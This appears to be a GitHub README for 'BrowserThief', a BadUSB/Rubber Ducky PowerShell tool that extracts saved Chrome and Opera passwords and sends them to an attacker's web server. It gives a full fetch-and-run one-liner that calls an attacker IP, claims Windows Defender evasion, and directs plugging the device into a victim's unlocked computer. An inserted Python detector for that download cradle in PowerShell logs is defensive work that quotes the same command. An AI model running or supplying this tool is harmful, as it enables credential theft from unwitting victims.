PowerShell script that extracts and steals browser-saved passwords

Primary language: PowerShell. License: MIT.

BrowserThief

All-in-one Rubber Ducky/BadUSB that runs a PowerShell script to extract and steal browser-saved passwords and stash them on your Flask web server. It currently extracts passwords from Opera/OperaGX/Chrome. I will be adding support for more browsers like Firefox soon!


Features

  • The PowerShell script runs in-memory and avoids writing to disk, which evades Windows Defender detection
  • PowerShell execution policy doesn't affect it whatsoever
  • Includes an Arduino RubberDucky script that runs in less than 2 seconds
  • Extracts passwords from all Chrome profiles, Opera and OperaGX
  • Will be adding Firefox soon

Setup

  • Set up the web server that catches the passwords:
    foo@bar:~$ sudo apt install docker.io
    foo@bar:~$ git clone https://github.com/ScribblerCoder/BrowserThief
    foo@bar:~$ cd BrowserThief/Web
    foo@bar:~$ sudo bash build-docker.sh

Instructions

  • Finish Setup first!
  • Simply run the PowerShell script:
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ScribblerCoder/BrowserThief/main/BrowserThief.ps1');pumpndump -hq http://<Your-IP>:1337;exit
  • Or you can use the rubber ducky for stealth/speed
    • Needs an Arduino that supports <Keyboard.h> (Nano, Leonardo)
    • Install Arduino IDE from their website
    • Open RubberDuckyScript.ino in the IDE and replace https://dump.silvercryptor.xyz with your IP; see Setup to set up the web server
    • Compile and upload the script to the Arduino
    • Insert the USB into the victim's computer (needs to be unlocked)
    • Profit 💰💰💰
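
From a detection standpoint, the one-liner above is a download cradle: Net.WebClient DownloadString fetches script text and iex runs it in memory. The following is an added example, not part of the BrowserThief project, that flags that shape in PowerShell Script Block Logging (event ID 4104) text. It assumes script block logging is enabled and the events have been exported; the sample records, host names and the 203.0.113.10 address are constructed.

```python
import re

# Shape of the README's one-liner: a string fetched with Net.WebClient
# DownloadString and executed by Invoke-Expression (alias iex).
FETCH = re.compile(r"net\.webclient\b.*?\.downloadstring\s*\(", re.I | re.S)
EXEC = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)
# Function name called by the README's one-liner.
TOOL_FN = re.compile(r"(?<![\w-])pumpndump(?![\w-])", re.I)
URL = re.compile(r"https?://[^\s'\");]+", re.I)

def classify(script_text):
    """Return (severity, reasons, urls) for one ScriptBlockText value."""
    reasons = []
    if FETCH.search(script_text):
        reasons.append("webclient-downloadstring")
    if EXEC.search(script_text):
        reasons.append("invoke-expression")
    if TOOL_FN.search(script_text):
        reasons.append("pumpndump-call")
    cradle = {"webclient-downloadstring", "invoke-expression"} <= set(reasons)
    # Fetch and execute in one block is the cradle; either alone also
    # appears in ordinary admin scripts, so it only rates "low".
    if cradle or "pumpndump-call" in reasons:
        severity = "high"
    elif reasons:
        severity = "low"
    else:
        severity = None
    return severity, reasons, URL.findall(script_text)

def triage(events):
    """Return one alert per event whose script block rates 'high'."""
    alerts = []
    for ev in events:
        severity, reasons, urls = classify(ev["script"])
        if severity == "high":
            alerts.append({"host": ev["host"], "reasons": reasons, "urls": urls})
    return alerts

# Constructed sample 4104 records (hosts and 203.0.113.10 are made up).
SAMPLE_EVENTS = [
    {"host": "WS-014", "script": "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ScribblerCoder/BrowserThief/main/BrowserThief.ps1');pumpndump -hq http://203.0.113.10:1337;exit"},
    {"host": "WS-002", "script": "Invoke-Expression 'Get-Date'"},
    {"host": "SRV-01", "script": "(New-Object Net.WebClient).DownloadString('https://intranet.example.test/version.txt') | Out-File v.txt"},
    {"host": "WS-007", "script": "Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```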

PoC

Victim POV

Just plug in your BadUSB and watch the magic


Attacker POV


Credits

This project wouldn't exist without the guidance of these examples

Disclaimer

This is for educational purposes only. I bear no responsibility for misuses of this project.